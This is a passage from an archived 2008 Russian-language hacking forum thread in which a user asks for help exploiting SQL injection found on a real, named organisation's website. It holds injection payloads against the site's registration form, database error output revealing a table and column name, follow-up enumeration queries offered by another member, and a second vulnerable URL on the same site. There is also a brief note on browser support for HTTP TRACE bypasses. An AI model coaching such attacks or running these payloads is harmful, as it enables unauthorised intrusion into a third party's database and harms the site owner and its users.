HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 161 из 2422 « Первая < 61111151 157 158 159 160 161 162 163 164 165 1712112616611161 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.04.2008, 17:24
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Велемир
Тебе не надоело спамить тему?За 3 дня 3 страницы твоих сабжей половина из которых какие то коментарии. Не пробывал объеденять свои вопросы(кнопочка едит)
По сабжу вот темы юзай поиск
_http://forum.antichat.ru/printthread.php?t=62866&pp=40
_http://forum.antichat.ru/printthread.php?t=56409
 

  #2  
Старый 09.04.2008, 17:29
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Да лан те, места жалко ?))))))))))))))
 

  #3  
Старый 09.04.2008, 17:42
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию
Поправлю Scipio, не только IE, на данный момент все браузеры на Gecko( FF =>2.0.0.5 ), Opera =>9.50 beta, IE =>6(path). PHP =>5.2, по умолчанию метод TRACE уставновлен в положение on(IIS/Apache), плюс все публичные примеры обхода HTTP TRACE основаны при использование ActiveX компонентов, что не поддерживается( при стандартных компонентах ) FF и Оперой, зато присутствует XMLHTTPRequest.
 

  #4  
Старый 09.04.2008, 21:24
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900

Репутация: 17
Post
Добрый вечер,подскажите как реализовать уязвимость:

1.найден уязвимый параметр login при регистрации,
ввожу ' выдаётся следующее:

Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Unclosed quotation mark before the character string '''. 

/forums/Advising/register.asp, line 49
2.ввожу
Код:
' having 1=1--
в уязвимое поле.
Выдаётся:

Код:
Microsoft OLE DB Provider for SQL Server error '80040e14' 

Column 'members.M_Name' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. 

/forums/Advising/register.asp, line 49
т.е. я узнал,что имя таблицы: "members", а имя первой колонки: "M_Name"???

Что делать дальше?
Последний раз редактировалось SQL~In[J]ecTi0n; 09.04.2008 в 21:31..
 

  #5  
Старый 09.04.2008, 21:41
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
узнай версию SELECT @@version
имя текущего юзверя например
select user_name();
slect user;
select system_user();
mmm... еще select DB_NAME() - имя базы

ну или апишку select host_name() ... хз )))

http://msdn2.microsoft.com/en-us/library/ms173768.aspx

а что это единственное место где тебе ошибки выдает?
Последний раз редактировалось xcedz; 09.04.2008 в 21:44..
 

  #6  
Старый 09.04.2008, 21:46
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900

Репутация: 17
По умолчанию
to xcedz

Не катит...)

Да,единственное,вроде...
 

  #7  
Старый 09.04.2008, 21:49
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
ет чтоли? http://www.amideast.org/forums/advising/register.asp?mode=doit )))))
 

  #8  
Старый 09.04.2008, 21:52
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900

Репутация: 17
По умолчанию
to xcedz

да))

P.S. Еще в форме поиска такая же байда.Ток что нашел)

Знаешь,что дальше делать?
 

  #9  
Старый 09.04.2008, 21:57
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
http://amideast.org/Pubs_one/products.aspx?skunumb=

ОПА.. размышляем дальше а говорил тока там ошибку выдает ...
 

  #10  
Старый 09.04.2008, 22:02
SQL~In[J]ecTi0n
Познающий
Регистрация: 07.03.2008
Сообщений: 41
Провел на форуме:
572900

Репутация: 17
По умолчанию
Если честно,то мои рассуждения дальше пока не идут,опыта и знаний маловато,так что прошу помочь...
 
 
Страница 161 из 2422 « Первая < 61111151 157 158 159 160 161 162 163 164 165 1712112616611161 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ